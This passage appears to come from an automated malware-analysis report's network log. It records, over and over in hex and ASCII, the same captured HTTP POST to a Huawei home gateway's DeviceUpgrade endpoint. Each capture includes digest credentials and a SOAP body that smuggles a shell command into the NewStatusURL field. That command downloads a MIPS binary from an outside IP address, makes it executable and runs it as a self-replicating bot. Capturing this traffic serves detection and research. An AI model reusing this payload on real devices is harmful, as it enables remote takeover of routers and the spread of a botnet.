36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 